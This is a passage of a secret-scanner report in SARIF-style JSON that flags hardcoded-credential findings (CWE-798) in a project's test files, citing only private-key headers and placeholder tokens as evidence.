PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 343}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16644, "scanner": "repobility", "fingerprint": "f29ba73329165ccbc6b2c61aadce8857", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 92}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16643, "scanner": "repobility", "fingerprint": "5b0676b40ac2de30b58e9f77dd95d4e7", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/machine-identity.test.ts"}, "region": {"startLine": 53}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16642, "scanner": "repobility", "fingerprint": "56cc8774e2fb9ab3305d6b3b11de9810", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 452}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16641, "scanner": "repobility", "fingerprint": "5485c6be35589efdd51678c5706fdd61", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 438}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16640, "scanner": "repobility", "fingerprint": "f879fdab13d028a936488e6b592b61da", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 356}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16639, "scanner": "repobility", "fingerprint": "95b716dcc5aa612a7b0204bd05197e71", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 163}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16638, "scanner": "repobility", "fingerprint": "beb551acc79f3ea3f9d5d174792aaaa3", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN OPENSSH PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 154}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16637, "scanner": "repobility", "fingerprint": "84d2be220d2dcd5bd58dfc232cf99b93", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN EC PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 145}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16636, "scanner": "repobility", "fingerprint": "488c0d37df2fa07f4b91a39a9e1ce992", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 135}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16635, "scanner": "repobility", "fingerprint": "c1ce5f8e8805cce647155db1ca3be802", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "xoxb-1234567890123-abcdefghijklmnop", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 104}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16634, "scanner": "repobility", "fingerprint": "1b2e9f13a55d112acf3c65ed156b9779", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 85}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16633, "scanner": "repobility", "fingerprint": "3793870afba480ce028b47d391e1a1eb", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "AKIAIOSFODNN7EXAMPLE", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/unit/ContentClassifier.test.ts"}, "region": {"startLine": 113}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16632, "scanner": "repobility", "fingerprint": "e739da4eebe8fc496bbbc0675ec517c4", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "ghp_aabbccddee11223344556677889900aabbcc", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/security-wiring.test.ts"}, "region": {"startLine": 149}}}]}, {"ruleId": "SECR001", "level": "error", "message": {"text": "Hardcoded secret in source"}, "properties": {"repobilityId": 16631, "scanner": "repobility", "fingerprint": "fe0e9f6d79253fc908a2a1792f64b5d1", "category": "credential_exposure", "severity": "critical", "confidence": 0.85, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"snippet": "-----BEGIN RSA PRIVATE KEY-----", "aljefra_cwe": ["CWE-798"], "aljefra_owasp": "A07:2021", "aljefra_pattern_slug": "hardcoded-secret"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/integration/output-privacy-routing.test.ts"}, "region": {"startLine": 243}}}]}]}]}